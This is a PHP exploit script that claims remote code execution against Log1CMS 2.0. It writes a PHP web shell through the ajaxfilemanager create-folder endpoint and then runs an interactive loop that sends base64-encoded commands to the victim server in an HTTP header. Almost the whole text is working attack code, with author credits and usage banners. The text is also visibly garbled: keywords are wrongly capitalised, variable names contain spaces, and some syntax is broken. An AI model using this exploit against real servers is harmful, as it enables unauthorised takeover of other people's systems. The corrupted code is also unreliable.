<? Php
/*
+ ----------------------------------------------------------- +
+ Log1CMS 2.0 (ajax_create_folder.php) Remote Code Execution +
+ ----------------------------------------------------------- +
Search: Log1CMS 2.0
Developer: http://log1cms.sourceforge.net/
Defect type: Remote Code Execution
Author: Adel SBM www.2cto.com www. The-code.tk
Test Platform: Windows XP SP2
+ ----------------------------------------------------------- +
+ VIVE Algeria +
+ ----------------------------------------------------------- +
*/
Error_reporting (0 );
Set_time_limit (0 );
Ini_set ("default_socket_timeout", 5 );
Function http_send ($ host, $ packet)
{
If (! ($ Sock = fsockopen ($ host, 80 )))
Die ("\ n [-] No Response From {$ host}: 80 \ n ");
Fwrite ($ sock, $ packet );
Return stream_get_contents ($ sock );
}
Print "\ n + -------------------------------------------------------------------------- + ";
Print "\ n | Log1CMS 2.0 Remote Code Execution Exploit by Adel SBM | ";
Print "\ n | SPl ThanX To: EgiX (exploit founder end coder)-The DoN | ";
Print "\ n | Greetz to: Over-X & ind0ushka... | ";
Print "\ n | TeaM Official website: www.2cto.com | ";
Print "\ n | VIVE Algeria | ";
Print "\ n + ------------------------------------------------------------------------ + \ n ";
If ($ argc <3)
{
Print "\ n + -------------------------------------------------------------------------- + ";
Print "\ n | Usage...: php $ argv [0]
Print "\ n | Example...: php $ argv [0] www.2cto.com/| ";
Print "\ n | Example...: php $ argv [0] www.2cto.com/log1cms/| ";
Print "\ n + ------------------------------------------------------------------------ + \ n ";
Die ();
}
$ Host = $ argv [1];
$ Path = $ argv [2];
$ Payload = "foo = <? Php error_reporting (0); print (_ code _); passthru (base64_decode (\ $ _ SERVER [HTTP_CMD]); die;?> ";
$ Packet = "POST {$ path} admin/libraries/ajaxfilemanager/ajax_create_folder.php HTTP/1.0/r \ n ";
$ Packet. = "Host: {$ host} \ r \ n ";
$ Packet. = "Content-Length:". strlen ($ payload). "\ r \ n ";
$ Packet. = "Content-Type: application/x-www-form-urlencoded \ r \ n ";
$ Packet. = "Connection: close \ r \ n {$ payload }";
Http_send ($ host, $ packet );
$ Packet = "GET {$ path} admin/libraries/ajaxfilemanager/inc/data. php HTTP/1.0 \ r \ n ";
$ Packet. = "Host: {$ host} \ r \ n ";
$ Packet. = "Cmd: % s \ r \ n ";
$ Packet. = "Connection: close \ r \ n ";
While (1)
{
Print "\ n @ AdelSBM #";
If ($ cmd = trim (fgets (STDIN) = "exit") break;
Preg_match ("/_ code _ (. *)/s", http_send ($ host, sprintf ($ packet, base64_encode ($ cmd), $ m )?
Print $ m [1]: die ("\ n [-] Exploit failed! \ N ");
}
?>